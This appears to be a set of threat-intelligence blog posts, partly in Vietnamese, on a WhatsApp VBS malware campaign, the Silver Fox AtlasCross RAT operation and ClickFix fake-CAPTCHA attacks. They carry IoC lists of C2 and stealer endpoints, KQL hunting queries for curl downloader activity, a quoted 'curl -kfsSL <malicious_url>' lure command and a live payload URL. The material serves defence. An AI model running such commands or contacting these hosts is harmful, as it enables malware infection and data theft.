Chiến dịch này thể hiện sự chuyên nghiệp cao của nhóm tấn công khi tích hợp nhiều lớp evasion trong một chuỗi tấn công duy nhất. Việc lạm dụng các dịch vụ cloud uy tín toàn cầu (AWS, Tencent, Backblaze) phản ánh xu hướng "living off trusted services" — phiên bản nâng cấp của LotL truyền thống. Mặc dù danh tính nhóm đe dọa chưa được Microsoft công khai quy kết, nhưng mức độ tinh vi và việc sử dụng AnyDesk như C2 persistent gợi ý khả năng đây là một nhóm APT có tổ chức hoặc nhóm cybercrime chuyên nghiệp nhằm vào doanh nghiệp. Đây là một nhắc nhở quan trọng rằng không có nền tảng nào là an toàn tuyệt đối và chính sách "zero trust" đối với mọi file nhận được — kể cả từ ứng dụng nhắn tin phổ biến — là yêu cầu bắt buộc trong môi trường doanh nghiệp hiện đại.

Tham Khảo

1. WhatsApp malware campaign delivers VBScript and MSI backdoors

2. WhatsApp malware campaign uses malicious VBS files to gain persistent access

3. Microsoft Warns of WhatsApp-Delivered VBS Malware Hijacking Windows via UAC Bypass

Executive Summary

In late February 2026, Microsoft Defender Experts detected a sophisticated attack campaign leveraging WhatsApp to distribute malicious Visual Basic Script (VBS) files to Windows users. Once a victim executes the file, a multi-stage infection chain is triggered, ultimately granting the attacker full system control via MSI backdoors. What makes this campaign particularly notable is its combination of social engineering, Living-off-the-Land (LotL) techniques, and public cloud infrastructure to evade security solutions.

Threat Landscape

This campaign reflects a growing trend of abusing trusted communication platforms like WhatsApp to deliver malware. Rather than relying on traditional email phishing, attackers exploit the inherent trust users place in familiar messaging applications to lower their psychological defenses. Notably, the lure content used to convince victims to open the VBS file has not yet been identified.

Detailed Attack Chain

The campaign unfolds across four distinct stages, each building the foundation for the next:

Stage 1 — Initial Access via WhatsApp

A malicious VBS file is sent directly through a WhatsApp message. Upon execution, the script:

• Creates a hidden directory at C:\ProgramData\EDS8738

• Copies and renames legitimate Windows tools: curl.exe → netapi.dll, bitsadmin.exe → sc.exe

• The renamed files retain their original PE metadata (OriginalFileName), creating a detectable anomaly for EDR solutions

Stage 2 — Cloud Payload Retrieval

Using the renamed binaries with downloader flags, the malware connects to reputable cloud services to fetch secondary payloads:

• auxs.vbs and WinUpdate_KB5034231.vbs are hosted on AWS S3, Tencent Cloud, and Backblaze B2

• This technique makes malicious requests appear as normal system traffic, making it extremely difficult to distinguish from legitimate activity

Stage 3 — Privilege Escalation & Persistence

This is the most critical stage of the campaign:

• The malware modifies the ConsentPromptBehaviorAdmin registry value to disable UAC prompts

• It repeatedly attempts to launch cmd.exe with elevated privileges, looping until successful or forcibly interrupted

• Persistence is written to HKLM\Software\Microsoft\Win to survive reboots

• The entire privilege escalation process occurs without any user interaction

Stage 4 — Final Backdoor Deployment

The final stage installs MSI packages that are not digitally signed:

Through the fake AnyDesk installation, the attacker achieves persistent remote access, enabling data exfiltration, additional malware deployment, or enrollment of the system into a botnet.

Technical Analysis

MITRE ATT&CK Mapping

Evasion Highlights

This campaign is particularly dangerous due to the simultaneous use of multiple evasion techniques. The combination of legitimate Windows binaries (LotL) with cloud hosting renders signature-based and domain reputation-based security solutions largely ineffective. Furthermore, delayed execution and staged delivery help bypass sandbox behavioral analysis systems.

Indicators of Compromise (IoCs)

SHA-256 Hashes — VBS Scripts (Initial Stage)

SHA-256 Hashes — VBS Droppers (Cloud Stage)

SHA-256 Hashes — MSI Installers (Final Payload)

URLs — Cloud Payload Hosting

C2 Domains

Hunting Queries (Microsoft Defender / KQL)

The following queries were provided by Microsoft to hunt for related activity:

Detect malicious VBS script execution:

DeviceProcessEvents
| where InitiatingProcessFileName has "wscript.exe"
| where InitiatingProcessCommandLine has_all ("wscript.exe",".vbs")
| where ProcessCommandLine has_all ("ProgramData","-K","-s","-L","-o", "https:")

Detect next-stage VBS payload retrieval:

DeviceFileEvents
| where InitiatingProcessFileName endswith ".dll"
| where InitiatingProcessVersionInfoOriginalFileName contains "curl.exe"
| where FileName endswith ".vbs"

Detect malicious MSI installer drop:

DeviceFileEvents
| where InitiatingProcessFileName endswith ".dll"
| where InitiatingProcessVersionInfoOriginalFileName contains "curl.exe"
| where FileName endswith ".msi"

Detect outbound C2 communication:

DeviceNetworkEvents
| where InitiatingProcessFileName endswith ".dll"
| where InitiatingProcessVersionInfoOriginalFileName contains "curl.exe"
| where InitiatingProcessCommandLine has_all ("-s","-L","-o", "-k")

Mitigation & Recommendations

Endpoint Controls

• Restrict script hosts in untrusted paths: wscript.exe, cscript.exe, mshta.exe

• Monitor renamed Windows binaries executing with anomalous flags, especially curl and bitsadmin downloader flags

• Enable EDR in block mode to neutralize malicious artifacts even when antivirus does not detect them

Network & Cloud Monitoring

• Audit and filter outbound traffic to public cloud services (AWS S3, Tencent Cloud, Backblaze B2) in enterprise contexts

• Block connections to known C2 domains: Neescil[.]top, velthora[.]top

Persistence Detection

• Continuously monitor registry changes at HKLM\Software\Microsoft\Win

• Alert on modifications to ConsentPromptBehaviorAdmin (indicator of UAC bypass)

• Flag MSI package installations that lack valid digital signatures

User Awareness

• Train employees never to open attachments (especially .vbs, .js, .bat) received via messaging platforms such as WhatsApp — even from known contacts

• Establish a clear incident reporting process for suspicious messages or files received via any communication channel

Microsoft-Specific Recommendations

• Enable cloud-delivered protection in Microsoft Defender Antivirus

• Activate Tamper Protection combined with DisableLocalAdminMerge

• Enable Attack Surface Reduction (ASR) rules to block LotL techniques

Microsoft Defender Detections

Analyst Assessment

This campaign demonstrates a high level of sophistication, integrating multiple evasion layers within a single, cohesive attack chain. The abuse of globally trusted cloud services (AWS, Tencent, Backblaze) reflects an emerging trend of "living off trusted services" — an evolution beyond traditional LotL techniques. While Microsoft has not publicly attributed this activity to a specific threat actor, the overall sophistication and use of AnyDesk as a persistent C2 mechanism strongly suggests this is the work of an organized APT group or professional cybercrime operation targeting enterprises. This campaign serves as a critical reminder that no platform is inherently safe, and enforcing a zero-trust policy toward all received files — regardless of the application used — is a non-negotiable requirement in today's enterprise security posture.

Tham Khảo

1. WhatsApp malware campaign delivers VBScript and MSI backdoors

2. WhatsApp malware campaign uses malicious VBS files to gain persistent access

3. Microsoft Warns of WhatsApp-Delivered VBS Malware Hijacking Windows via UAC Bypass

Silver Fox — a Chinese-speaking threat actor — is intensifying targeted cyber campaigns against users and organizations across the Asia-Pacific region. According to a report by Germany-based Hexastrike published in late March 2026, the latest campaign deploys a previously undocumented remote access trojan named AtlasCross RAT, distributed through 11 typosquatted domains all registered on the same date — October 27, 2025. Concurrently, Sekoia (France) confirmed the group maintains a "dual-track" model: conducting APT-style espionage operations while continuing financially motivated cybercrime activities across South and Southeast Asia.

Threat Actor Profile

Silver Fox is a Chinese-origin cybercrime/APT group active since at least 2022. The group is tracked under multiple aliases:

According to Knownsec 404, Silver Fox is categorized among the "most actively operating cyber threats" in recent years, primarily targeting senior management personnel and finance departments within enterprises. Since 2024, the group has pivoted toward more structured espionage-oriented campaigns alongside its traditional financial objectives.

Campaign Timeline (2025–2026): Three Attack Waves

Wave 1 — Taiwan Targeting (Early 2025)

Beginning at least January 2025, Silver Fox launched phishing campaigns impersonating Taiwan's National Taxation Bureau, timed precisely around the announcement of corporate tax audit lists. Malicious emails carried PDF attachments; when victims clicked embedded content, an infection chain was triggered, deploying ValleyRAT through DLL side-loading.

Detailed infection chain:

1. Phishing email → malicious PDF attachment impersonating Taiwan's Ministry of Finance

2. PDF contains hidden clickable region (/Annot) leading to ZIP download from myqcloud infrastructure

3. ZIP contains python311.dll (shellcode loader) + View10.exe decoy application

4. Executes ValleyRAT, configured to load from C:\users\public\download\bb.jpg

5. C2 connection: 9010.360sdgg[.]com

By April 2025, Fortinet confirmed the campaign had expanded to Japan.

Wave 2 — RMM Tool Abuse (Late 2025)

From mid-December 2025, Silver Fox shifted to distributing SyncFuture TSM — a legitimate Chinese remote management tool (RMM) that was deliberately misconfigured. Attackers exploited a configuration handling flaw to embed C2 addresses directly into the filename ([ipv4]ClientSetup.exe), thereby avoiding modification of the file's digital signature. This campaign expanded to Malaysia, Philippines, Thailand, Indonesia, Singapore, and India.

Wave 3 — Python Stealer Disguised as WhatsApp (Early 2026)

In February 2026, Silver Fox replaced the RMM tool with a custom Python stealer disguised as a WhatsApp application, targeting primarily Malaysia. This tool harvests credentials and sensitive documents, uploading them to C2 at xqwmwru[.]top, leaving behind distinctive artifacts:

• C:\WhatsAppBackup\WhatsAppData.zip

• %TEMP%\whatsapp_backup.lock

• Spoofed User-Agent: WhatsAppBackup/1.0

New Weapon: AtlasCross RAT

AtlasCross RAT represents Silver Fox's latest weapons evolution, discovered by Hexastrike in March 2026. It is a more sophisticated variant built on the Gh0st RAT protocol framework — the same lineage as ValleyRAT and Winos 4.0.

AtlasCross RAT Infection Chain

1. Victim visits a fake website → downloads a ZIP file

2. ZIP contains a trojanized AutoDesk installer + legitimate decoy application

3. Trojanized AutoDesk launches a shellcode loader → decrypts embedded Gh0st RAT configuration

4. Downloads second-stage shellcode from bifa668[.]com over TCP port 9899

5. Executes AtlasCross RAT directly in memory (in-memory execution)

AtlasCross RAT Technical Capabilities

Notably, instead of using the popular BYOVD (Bring Your Own Vulnerable Driver) technique, AtlasCross RAT opts to directly drop TCP connections to Chinese security software — a more subtle evasion method.

Distribution Infrastructure: 11 Typosquatted Domains

All 11 AtlasCross RAT distribution domains were registered on the same date, October 27, 2025, indicating a high degree of premeditated preparation. The impersonated brands include applications popular within Chinese-speaking communities:

Critically, all installer packages carry a stolen Extended Validation (EV) Code-Signing Certificate issued to DUC FABULOUS CO., LTD — a Vietnamese company registered in Hanoi. This certificate has also appeared in unrelated malware campaigns, suggesting it is being shared across the criminal ecosystem to bypass digital signature verification mechanisms.

Target Scope & Geography

Silver Fox selectively targets by industry and role, focusing particularly on:

• Finance officers, accountants, and compliance personnel within enterprises

• Mid-to-senior level managers at Southeast Asian organizations

• Japanese manufacturers targeted through spear-phishing lures related to taxes and payroll

Countries targeted from December 2025 onward include: Japan, Malaysia, Philippines, Thailand, Indonesia, Singapore, India, and Taiwan. India was targeted through income tax lures bundled with Blackmoon malware, documented by eSentire in January 2026.

TTPs Mapped to MITRE ATT&CK Framework

Indicators of Compromise (IoCs)

AtlasCross RAT Distribution Domains

app-zoom[.]com | signal-signal[.]com | telegrtam[.]com.cn
www-surfshark[.]com | www-teams[.]com | trezor-trezor[.]com
ultraviewer-cn[.]com | quickq-quickq[.]com | kefubao-pc[.]com
wwtalk-app[.]com | eyy-eyy[.]com

C2 Servers

bifa668[.]com (TCP:9899)  — AtlasCross RAT stage 2
xqwmwru[.]top             — Python stealer exfiltration endpoint
9010.360sdgg[.]com        — ValleyRAT C2

Python Stealer Endpoints (Wave 3)

https://xqwmwru[.]top/upload_large.php
https://xqwmwru[.]top/upload_status.php
https://xqwmwru[.]top/admin/login.php

Phishing Domains (Sekoia Documented)

googlevip[.]icu | oytdwzz[.]shop | gov[.]incometax[.]click
megamovielord[.]com | primetechstocks[.]com | domainCt[.]com

(Full list of 40+ domains available in Sekoia IoC Annex)

Strategic Assessment

Silver Fox is executing a "dual-track" model — simultaneously functioning as an APT and a cybercrime group — a trend increasingly observed within China-nexus threat ecosystems. Sekoia assesses this may be a "moonlighting" arrangement: a criminal group selling initial access to state-affiliated entities, or being outsourced by a state actor to conduct initial intrusion phases.

The continued use of ValleyRAT even after its builder was leaked in 2023, combined with the active development of kernel-mode rootkit plugins, demonstrates that Silver Fox possesses considerable technical resources and has not been disrupted by source code exposure. The emergence of AtlasCross RAT — featuring a dedicated PowerChell framework and ChaCha20 per-packet encryption — is clear evidence of sustained and continuous weapons development capability.

Defensive Recommendations

For SOC / Blue Teams:

• Monitor outbound connections to domains matching the pattern [brand]-[brand].com or www-[brand].com

• Deploy sandbox analysis for all PDFs and archive files (ZIP/RAR) prior to delivery to end users

• Alert on unfamiliar EV code-signing certificates, especially from low-profile or unknown entities

• Hunt for PowerShell processes spawned from non-standard parent processes (particularly where AMSI is disabled)

For System Administrators:

• Block TCP connections to bifa668[.]com and xqwmwru[.]top at the perimeter

• Audit Scheduled Tasks on all Windows endpoints for anomalous entries

• Restrict the use of unapproved RMM tools (particularly SyncFuture TSM) via application allowlisting

• Configure WDAC (Windows Defender Application Control) to prevent DLL injection into the WeChat process

For End Users:

• Always download software exclusively from official vendor websites — carefully verify the full domain name before downloading

• Be suspicious of emails referencing tax audits, salary adjustments, or stock option grants that contain attachments or links

• Immediately report to IT any email requesting the content be "forwarded to a finance team member"

Conclusion

Silver Fox is one of the most dynamic and adaptable threat groups currently operating across Asia. With continuous weapons iteration (ValleyRAT → HoldingHands → RMM abuse → Python stealer → AtlasCross RAT), diversified attack vectors, and geographic expansion from China/Taiwan to all of Southeast Asia, the group poses a serious risk to organizations in the region — particularly those in financial services, manufacturing, and organizations relying on popular communication applications. Continuous tracking of this group and ongoing IoC updates are mandatory requirements for any Threat Intelligence program operating within the APAC region.

References

1. Silver Fox Expands Asia Cyber Campaign with AtlasCross RAT and Fake Domains

2. Silver Fox’s Dual-Pronged Strategy: Dissecting the ValleyRAT Distribution Campaign

3. Silver Fox: The Only Tax Audit Where the Fine Print Installs Malware

4. Silver Fox Cyber Campaigns Show Shift Toward Dual Espionage

5. A cunning predator: How Silver Fox preys on Japanese firms this tax season

Nhóm đe dọa Silver Fox — một tác nhân tấn công mạng nói tiếng Trung — đang đẩy mạnh các chiến dịch tấn công có chủ đích nhắm vào người dùng và tổ chức tại khu vực châu Á – Thái Bình Dương. Theo báo cáo của Hexastrike (Đức) công bố cuối tháng 3/2026, chiến dịch mới nhất triển khai một trojan truy cập từ xa chưa từng được ghi nhận trước đây mang tên AtlasCross RAT, phân phối qua 11 tên miền giả mạo được đăng ký cùng một ngày — 27/10/2025. Song song đó, Sekoia (Pháp) xác nhận nhóm này đang duy trì mô hình "hai mũi tên": vừa thực hiện các chiến dịch gián điệp kiểu APT, vừa tiếp tục các hoạt động tội phạm mạng vì lợi nhuận trải dài khắp Nam Á và Đông Nam Á.

Hồ Sơ Tác Nhân

Silver Fox là một nhóm tội phạm mạng/APT có nguồn gốc từ Trung Quốc, hoạt động ít nhất từ năm 2022. Nhóm được theo dõi dưới nhiều tên gọi khác nhau:

Theo Knownsec 404, Silver Fox được xếp vào danh sách "mối đe dọa mạng hoạt động tích cực nhất" trong những năm gần đây, chủ yếu nhắm vào nhân sự quản lý cấp cao và bộ phận tài chính tại các doanh nghiệp. Kể từ năm 2024, nhóm bắt đầu chuyển dịch sang các chiến dịch mang tính chất gián điệp có tổ chức bên cạnh mục tiêu tài chính truyền thống.

Diễn Biến Chiến Dịch (2025–2026): Ba Làn Sóng Tấn Công

Làn sóng 1 — Nhắm vào Đài Loan (Đầu 2025)

Từ ít nhất tháng 1/2025, Silver Fox triển khai chiến dịch phishing giả mạo cơ quan thuế quốc gia Đài Loan, lợi dụng đúng thời điểm công bố danh sách doanh nghiệp bị kiểm tra thuế. Email lừa đảo đính kèm file PDF chứa mã độc; khi nạn nhân nhấp vào nội dung trong file, chuỗi lây nhiễm kích hoạt và triển khai ValleyRAT thông qua DLL side-loading.

Chuỗi lây nhiễm cụ thể:

1. Email phishing → đính kèm PDF giả mạo Bộ Tài chính Đài Loan

2. PDF chứa vùng nhấp ẩn (/Annot) dẫn đến tải ZIP từ hạ tầng myqcloud

3. ZIP chứa python311.dll (shellcode loader) + 查看10.exe

4. Thực thi ValleyRAT, cấu hình tải từ C:\users\public\download\bb.jpg

5. Kết nối C2: 9010.360sdgg[.]com

Đến tháng 4/2025, Fortinet xác nhận chiến dịch mở rộng sang Nhật Bản.

Làn sóng 2 — Lạm dụng RMM Tool (Cuối 2025)

Từ giữa tháng 12/2025, Silver Fox chuyển sang phân phối công cụ SyncFuture TSM — một phần mềm quản trị từ xa (RMM) hợp pháp của Trung Quốc nhưng bị cấu hình sai. Kẻ tấn công khai thác lỗ hổng xử lý cấu hình để nhúng địa chỉ C2 trực tiếp vào tên file ([ipv4]ClientSetup.exe), do đó không làm thay đổi chữ ký số của file. Chiến dịch này mở rộng sang Malaysia, Philippines, Thái Lan, Indonesia, Singapore và Ấn Độ.

Làn sóng 3 — Python Stealer giả mạo WhatsApp (Đầu 2026)

Tháng 2/2026, Silver Fox thay thế RMM tool bằng một Python stealer tùy chỉnh được ngụy trang dưới dạng ứng dụng WhatsApp, nhắm chủ yếu vào Malaysia. Công cụ này thu thập thông tin đăng nhập, tài liệu nhạy cảm và tải lên C2 tại xqwmwru[.]top, để lại các artifact đặc trưng:

• C:\WhatsAppBackup\WhatsAppData.zip

• %TEMP%\whatsapp_backup.lock

• User-Agent giả mạo: WhatsAppBackup/1.0

Vũ Khí Mới Nhất: AtlasCross RAT

AtlasCross RAT là bước tiến hóa mới nhất trong kho vũ khí của Silver Fox, được phát hiện bởi Hexastrike vào tháng 3/2026. Đây là biến thể tinh vi hơn, xây dựng trên nền tảng giao thức Gh0st RAT (cùng dòng với ValleyRAT và Winos 4.0).

Chuỗi lây nhiễm AtlasCross RAT

1. Nạn nhân truy cập website giả mạo → tải file ZIP

2. ZIP chứa installer AutoDesk bị trojan hóa + ứng dụng hợp pháp giả mồi

3. AutoDesk trojanized khởi chạy shellcode loader → giải mã cấu hình Gh0st RAT nhúng sẵn

4. Tải second-stage shellcode từ bifa668[.]com qua TCP port 9899

5. Thực thi AtlasCross RAT trực tiếp trong bộ nhớ (in-memory execution)

Năng lực kỹ thuật của AtlasCross RAT

Đặc biệt, thay vì dùng kỹ thuật BYOVD (Bring Your Own Vulnerable Driver) phổ biến, AtlasCross RAT chọn cách ngắt kết nối TCP trực tiếp với các phần mềm bảo mật của Trung Quốc — một phương pháp né tránh phát hiện tinh tế hơn.

Hạ Tầng Phân Phối: 11 Tên Miền Typosquat

Toàn bộ 11 tên miền phân phối AtlasCross RAT được đăng ký cùng ngày 27/10/2025, chỉ ra mức độ chuẩn bị có chủ đích cao. Các thương hiệu bị giả mạo bao gồm các ứng dụng phổ biến trong cộng đồng nói tiếng Trung:

Đáng chú ý, toàn bộ các gói installer đều mang chữ ký Extended Validation (EV) Code-Signing Certificate bị đánh cắp từ công ty DUC FABULOUS CO., LTD — một doanh nghiệp Việt Nam đăng ký tại Hà Nội. Chứng chỉ này cũng xuất hiện trong các chiến dịch malware không liên quan khác, cho thấy nó đang được chia sẻ rộng rãi trong hệ sinh thái tội phạm mạng nhằm qua mặt cơ chế kiểm tra chữ ký số.

Mục Tiêu & Phạm Vi Địa Lý

Silver Fox tấn công có chọn lọc theo ngành và vai trò, đặc biệt là:

• Cán bộ tài chính, kế toán, tuân thủ (compliance) trong doanh nghiệp

• Nhà quản lý cấp trung và cao tại các tổ chức Đông Nam Á

• Nhà sản xuất Nhật Bản qua chiến dịch spear-phishing về thuế và lương

Các quốc gia bị nhắm mục tiêu từ tháng 12/2025 đến nay bao gồm: Nhật Bản, Malaysia, Philippines, Thái Lan, Indonesia, Singapore, Ấn Độ và Đài Loan. Ấn Độ bị tấn công qua lure về thuế thu nhập kèm malware Blackmoon, được eSentire ghi nhận vào tháng 1/2026.

TTPs Theo Framework MITRE ATT&CK

Indicators of Compromise (IoCs)

Tên miền phân phối AtlasCross RAT

app-zoom[.]com | signal-signal[.]com | telegrtam[.]com.cn
www-surfshark[.]com | www-teams[.]com | trezor-trezor[.]com
ultraviewer-cn[.]com | quickq-quickq[.]com | kefubao-pc[.]com
wwtalk-app[.]com | eyy-eyy[.]com

C2 Server

bifa668[.]com (TCP:9899) — AtlasCross RAT stage 2
xqwmwru[.]top — Python stealer exfiltration
9010.360sdgg[.]com — ValleyRAT C2

Python Stealer (Wave 3)

https://xqwmwru[.]top/upload_large.php
https://xqwmwru[.]top/upload_status.php
https://xqwmwru[.]top/admin/login.php

Phishing domains (Silver Fox campaign – Sekoia)

googlevip[.]icu | oytdwzz[.]shop | gov[.]incometax[.]click
megamovielord[.]com | primetechstocks[.]com | domainCt[.]com

(Danh sách đầy đủ 40+ domain tại Sekoia IoC Annex)

Đánh Giá Chiến Lược

Silver Fox đang thực hiện mô hình "dual-track" — vừa APT vừa tội phạm mạng — một xu hướng ngày càng phổ biến trong hệ sinh thái tấn công mạng Trung Quốc. Sekoia nhận định đây có thể là mô hình "moonlighting": một nhóm tội phạm mạng bán quyền truy cập cho các cơ quan nhà nước hoặc được thuê ngoài bởi một tác nhân nhà nước để thực hiện các giai đoạn xâm nhập ban đầu.

Việc Silver Fox tiếp tục dùng ValleyRAT ngay cả sau khi builder bị rò rỉ năm 2023 và liên tục phát triển plugin kernel-mode rootkit cho thấy nhóm này có nguồn lực kỹ thuật đáng kể, không bị gián đoạn bởi việc lộ mã nguồn. Sự xuất hiện của AtlasCross RAT với PowerChell framework và ChaCha20 encryption là bằng chứng rõ ràng về khả năng nâng cấp vũ khí liên tục.

Khuyến Nghị Phòng Thủ

Dành cho SOC / Blue Team:

• Giám sát các kết nối đến domain có cấu trúc [brand]-[brand].com hoặc www-[brand].com

• Triển khai sandbox phân tích PDF và file nén (ZIP/RAR) trước khi mở

• Cảnh báo với các EV code-signing certificate không quen thuộc, đặc biệt từ các thực thể ít tên tuổi

• Săn tìm tiến trình PowerShell được gọi từ tiến trình không hợp lệ (AMSI disabled)

Dành cho quản trị viên hệ thống:

• Chặn các kết nối TCP đến bifa668[.]com và xqwmwru[.]top

• Kiểm tra Scheduled Tasks bất thường trên các máy Windows trong tổ chức

• Hạn chế việc sử dụng RMM tools từ các nhà cung cấp không được phê duyệt (đặc biệt SyncFuture TSM)

• Cấu hình WDAC (Windows Defender Application Control) để ngăn DLL injection vào WeChat

Dành cho người dùng:

• Luôn tải phần mềm từ website chính thức — kiểm tra kỹ tên miền trước khi tải

• Nghi ngờ các email về kiểm tra thuế, điều chỉnh lương, quyền chọn cổ phiếu có đính kèm file hoặc link

• Báo cáo ngay bộ phận IT khi nhận email yêu cầu "chuyển cho nhân viên tài chính"

Kết Luận

Silver Fox là một trong những nhóm đe dọa năng động và linh hoạt nhất trong khu vực châu Á hiện nay. Với việc liên tục cập nhật vũ khí (ValleyRAT → HoldingHands → RMM abuse → Python stealer → AtlasCross RAT), đa dạng hóa vector tấn công và mở rộng địa bàn từ Trung Quốc/Đài Loan sang toàn bộ Đông Nam Á, nhóm này đặt ra rủi ro nghiêm trọng cho các tổ chức trong khu vực — đặc biệt là các doanh nghiệp tài chính, sản xuất và các đơn vị đang sử dụng các ứng dụng liên lạc phổ biến. Việc theo dõi liên tục nhóm này và cập nhật IoC là yêu cầu bắt buộc với bất kỳ chương trình Threat Intelligence nào tại khu vực APAC.

Tham Khảo

1. Silver Fox Expands Asia Cyber Campaign with AtlasCross RAT and Fake Domains

2. Silver Fox’s Dual-Pronged Strategy: Dissecting the ValleyRAT Distribution Campaign

3. Silver Fox: The Only Tax Audit Where the Fine Print Installs Malware

4. Silver Fox Cyber Campaigns Show Shift Toward Dual Espionage

5. A cunning predator: How Silver Fox preys on Japanese firms this tax season

Trong bối cảnh các cuộc tấn công mạng ngày càng tinh vi, một xu hướng đáng lo ngại đang dần nổi lên: kẻ tấn công không còn cần khai thác lỗ hổng hệ thống -họ khai thác chính người dùng. Chiến dịch ClickFix là minh chứng rõ ràng cho sự chuyển dịch này.

Được phát hiện bởi Recorded Future, ClickFix là một kỹ thuật tấn công dựa trên social engineering, trong đó nạn nhân bị lừa thực hiện các thao tác tưởng chừng vô hại — như sao chép và chạy một đoạn lệnh — nhưng thực chất lại vô tình kích hoạt mã độc trên chính thiết bị của mình. Không cần exploit, không cần malware phức tạp ngay từ đầu, toàn bộ chuỗi tấn công bắt đầu từ một hành động đơn giản của người dùng.

Điều khiến ClickFix trở nên nguy hiểm là khả năng vượt qua các cơ chế phòng thủ truyền thống. Khi chính người dùng chủ động thực thi lệnh, các giải pháp bảo mật như antivirus hay EDR thường khó phát hiện hành vi này là độc hại. Hơn nữa, các chiến dịch ClickFix hiện nay đã mở rộng phạm vi từ Windows sang cả macOS, cho thấy rõ xu hướng tấn công đa nền tảng và ngày càng tinh vi.

Luồng thực hiện

Các chiến dịch ClickFix thường tuân theo một quy trình tấn công có cấu trúc rõ ràng, gồm bốn giai đoạn liên tiếp - mỗi bước đều được tối ưu để khai thác hành vi người dùng và né tránh cơ chế phòng thủ truyền thống.

Lure – Dụ dỗ bằng giao diện hợp pháp giả mạo

Chuỗi tấn công bắt đầu bằng việc đánh lừa nạn nhân thông qua các giao diện quen thuộc như fake CAPTCHA hoặc hệ thống “human verification”. Những trang này được thiết kế tinh vi, tạo cảm giác đáng tin cậy và cấp bách, khiến người dùng tin rằng họ cần thực hiện một thao tác đơn giản để tiếp tục.

Execution – Kích hoạt qua thao tác người dùng (LotL)

Sau khi bị thuyết phục, nạn nhân được hướng dẫn sao chép và thực thi một đoạn lệnh đã được obfuscate (làm rối).
Các lệnh này thường được chạy thông qua: Run (Windows) hoặc Terminal (Windows/macOS).

Remote Ingress – Tải payload từ hạ tầng điều khiển

Khi lệnh được thực thi, hệ thống sẽ thiết lập kết nối ra bên ngoài để tải về các thành phần độc hại (payload staging). Quá trình này thường sử dụng: Shell nhúng, Script tải từ xa.

In-Memory Execution – Thực thi không để lại dấu vết

Ở giai đoạn cuối, mã độc được chạy trực tiếp trong bộ nhớ (in-memory execution) thay vì ghi xuống ổ đĩa. Điều này giúp chúng có thể hạn chế tối đa dấu vết forensic cũng như tránh bị phát hiện bởi các công cụ bảo mật dựa trên file.

Phân tích kỹ thuật chi tiết

Chiến dịch ClickFix lần này được chia thành nhiều cụm (cluster) với cách tiếp cận và kỹ thuật khác nhau, cho thấy mức độ nhắm mục tiêu rõ ràng và độ tinh vi cao trong việc triển khai payload.

Cluster 1 – QuickBooks (Nhắm vào người dùng kế toán)

Cụm này tập trung vào người dùng QuickBooks, chủ yếu là nhân sự kế toán hoặc tài chính. Kẻ tấn công sử dụng các trang giả mạo yêu cầu “khắc phục lỗi hệ thống” để dụ người dùng chạy lệnh.

Tại đây người dùng sẽ tự tay bật PowerShell với quyền Admin và chạy một tập lệnh do những kẻ tấn công thiết kế sẵn.

Sau khi nạn nhân đã thực hiện chạy lệnh trên thì lập tức Payload độc hại "bibi.php" và lưu nó vào thư mục "%TEMP%" dưới dạng script.ps1, giai đoạn này là bước thực hiện đầu tiên khởi động quá trình cài đặt NetSupport RAT.

Payload này liên tục kết nối đến đến địa chỉ C2: gologpoint[.]com - 62[.]164[.]177[.]230 để nhận lệnh và tải xuống các tệp độc hại khác. Trong quá trình phân tích các chuyên gia đã ghi nhận bốn tệp độc hại bổ sung bao gồm

NetSupport RAT sau khi được cài đặt attacker có thể thực hiện điều khiển máy từ xa, ghi lại màn hình, thao tác bàn phím cũng như cài thêm malware khác. Bên cạnh đó ở giai đoạn này kẻ tấn công cũng sẽ lấy đi toàn bộ thông tin nhạy cảm của khách hàng bao gồm: thông tin khách hàng, lịch sử giao dịch, thông tin thuế, tài chính...

Cluster 2 – Booking.com (Bẫy CAPTCHA giả)

Cụm này nhắm vào người dùng dịch vụ đặt phòng như Booking.com, sử dụng kỹ thuật giả CAPTCHA để tăng độ tin cậy. Tại đây người dùng được yêu cầu xác minh "KHÔNG PHẢI ROOT"

Cũng giống với Cluster 1, thay vì CAPTCHA thật, trang được thiết kế bởi kẻ tấn công sẽ hướng dẫn bạn thực hiện mở PowerShell và chạy lệnh có chứa tham số: "-ExecutionPolicy Bypass".

Với Command độc hại này kẻ tấn công có thể vô hiệu hóa chính sách bảo mật của PowerShell và cho phép chúng tải và thực thi script độc hại từ xa.

Trong suốt quá trình thực thi phần mềm độc hại cũng liên lạc liên tục với C2 để nhận lệnh và lưu trữ thông tin đánh cắp được.

Như đã nói thì điểm nguy hiểm ở đây chính là người dùng nghĩ mình đang làm bước bảo mật nhưng không, thực tế là tự mở cửa cho mã độc chạy.

Cluster 3 – Birdeye (Nhắm doanh nghiệp nhỏ)

Cluster này nhắm vào các doanh nghiệp nhỏ sử dụng nền tảng đánh giá như Birdeye. Tại đây trang giả mạo chứa JavaScript được thiết kế để né tránh các hệ thống quét tự động (sandbox, crawler).

Ở phần này kẻ tấn công cũng chạy một lệnh PowerShell được viết dưới dạng "obfuscated" (làm rối mã) nhằm che giấu hành vi thực sự. Đây là một kỹ thuật thường thấy trong các cuộc tấn công mạng hoặc mã độc để tải và thực thi tập lệnh từ xa.

Mục đích chính của nó là tải mã độc từ xa từ địa chỉ https://alababababa.cloud/cVGvQio6.txt sau đó thực thi trực tiếp nội dung tải về trên máy tính của nạn nhân.

Cluster 4 & 5 – macOS (Khai thác người dùng Mac)

Hai cluster này tập trung vào người dùng macOS – nhóm thường ít bị nhắm đến hơn, nên dễ mất cảnh giác.

Người dùng bị hướng dẫn chạy lệnh curl trong Terminal: "curl -kfsSL <malicious_url>". Trong đó tham số -k nhằm bỏ qua kiểm tra chứng chỉ TLS (có thể là server giả mạo), còn tham số -fsSL sẽ tải nội dung “im lặng”, không hiển thị lỗi.

Payload sẽ được che giấu bằng chuỗi hex encoding, base64 encoding và ngay sau đó được giải mã và thực thi trực tiếp trên máy. Sau khi chạy tập lệnh sẽ tải và chạy MacSync Stealer. Mã độc này có nhiệm vụ đánh cắp thông tin trình duyệt cũng như cookie, credential, dữ liệu ví crypto.

Điểm đáng chú ý của chuỗi lây nhiễm này là khả năng tấn công trực tiếp vào Terminal (trusted interface), kẻ tấn công cũng tài tình lợi dụng tâm lý “Mac an toàn hơn Windows”.

Kết luận

Chiến dịch ClickFix cho thấy sự kết hợp hiệu quả giữa social engineering và phân phối mã độc đa nền tảng, nhắm vào cả Windows và macOS thông qua các thương hiệu giả mạo như QuickBooks, Booking hay Apple.

